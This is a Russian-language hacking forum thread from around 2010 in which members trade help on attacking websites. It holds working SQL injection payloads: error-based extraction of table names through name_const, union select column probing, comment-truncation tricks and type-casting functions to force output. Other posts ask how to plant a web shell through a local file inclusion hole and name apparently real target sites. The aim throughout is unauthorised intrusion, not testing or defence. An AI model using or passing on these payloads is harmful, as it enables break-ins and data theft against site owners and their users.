Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    site.com/2.php?id=6+or(1,2)=(select*from(select name_const((select table_name from information_schema.tables limit 17,1),1),name_const((select table_name from information_schema.tables limit 17,1),1))a)

    or

    site.com/2.php?id=6 union select * from(select * from(select name_const((select table_name from information_schema.tables limit 17,1), 11)d) as t join (select name_const((select table_name from information_schema.tables limit 17,1), 11)e) b)a
     
    #15121 R1dex, 16 Oct 2010
    Last edited: 16 Oct 2010
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Имеется локальный инклуд. С нул байтом. Цель - залить шелл.
    На портале нет ни форума, ни блога - там где можна залить какую либо картинку и потом ее приинклудить. Нужна помощь... подкиньте идейку, как заинклудить шелл)
     
  3. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    http://www.xakep.ru/post/49508/default.asp
     
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    уже два дня мучаюсь ((, тут как поступит?
    Привожу варианты:
    http://site.net/script.php?seeking_sex=1'

    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13

    http://site.net/script.php?seeking_sex=1')
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

    http://site.net/script.php?seeking_sex=1' order by 1--
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order b' ) AND (user_master.seeking_sexuality like '2' OR user_master' at line 13

    тут одинаков ответ:
    http://site.net/script.php?seeking_sex=1') order by 1--
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

    http://site.net/script.php?seeking_sex=1') order by 1000--
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

    тока на:
    http://site.net/script.php?seeking_sex=1'' order by 1--
    норм стр

    но на:
    http://site.net/script.php?seeking_sex=1'' order by 1000--
    ответ тоже норм стр ((

    Как можно решит тут? floor не помог
    Заранее благодарен

    PS. линк не палил
     
  5. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Многострочный запроc, а вы режете -- , используйте /*.
    Если не прокатит /*, то в уязвимый параметр 1') and ('1'='1.
    Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.
     
    #15125 Strilo4ka, 17 Oct 2010
    Last edited: 17 Oct 2010
    2 people like this.
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс
    пробовал так:
    http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*
    без ошибок но и без профилей

    а так:
    http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13

    http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*
    без ошибок но и без профилей

    что то не получится чтол
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    YuNi|[c гадать трудно, думаю линк помог бы быстрее решить проблему
     
    _________________________
  8. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну линк в студию просто убет его ))
    Отправил в пм
     
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    В одном сайте при бронирование номера вылез такое дело:

    Это уязвимость ? (и вообше что это такое? )
     
  10. hakrat

    hakrat New Member

    Joined:
    26 Sep 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А такое как раскрутить

    http://steroidman.ru/dle_haki/page/999999999999999999
     
  11. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    видимо ваф ругался или скрипт неправильно обрабатывал запросы
     
  12. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    YuNi|[c запрос ограничен по количеству символов, а сам пытался крутить этот сайт

    вот тут скуль, но больше 5 символов не вставить.

    попробуй post передать 1' order by 10/* и увидишь результат

    сам голову долго ломал над этим
     
  13. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну вообше то я и постом отправлял все и 1' order by 10/* тоже пробовал ничего ((
    Да там отрезает энное кол символов но тут скул очевиден и вот пробую разные варианты. Пока не пофиксили но и решение тоже нету ((
     
  14. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на
    http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10
    но и не выводит не чего...
     
  15. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Подскажите, где скачать скрипты для sql blind injection... когда-то качал с форума, сча не найду никак))
     
  16. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2KREGI,
    пробуй как blind sql inj, но вообще лучше бы линк кинул сюда
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Попробуй так

    http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null

    http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null

    Возможные варианты:

    - не соответствует кодировка или тип данных.

    Тогда, пользуйся функциями приведения типов

    convert(version(),binary)
    convert(version()+using+latin1)
    convert(version()+using+binary)
    cast(version()+as+binary)
    cast(version()+as+int)
    cast(version()+as+char)
    и тд.

    Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке

    aes_decrypt(aes_encrypt(version(),1),1)
    unhex(hex(version()))

    Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL.

    - у скули нету вывода.
     
    #15137 h00lyshit!, 19 Oct 2010
    Last edited: 20 Oct 2010
  18. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Redwood ты тоже посмотри на мои варианты может у тя что получится
    https://forum.antichat.ru/threadnav46016-1536-10.html
     
  19. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    http://veer[antigoogle]mirov.ru/forum/?f=1&p='
    Помогите. явная скуля.
     
  20. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    я пробовал по разному, если http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null

    http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
    то показывает абракадабру.

    функции приведения типов не дали не чего...
    что делать если у скули нет вывода?
    blind sql inj вроде работает, определил версию...но вывести через нее ,как я не понял :confused:
     
Thread Status:
Not open for further replies.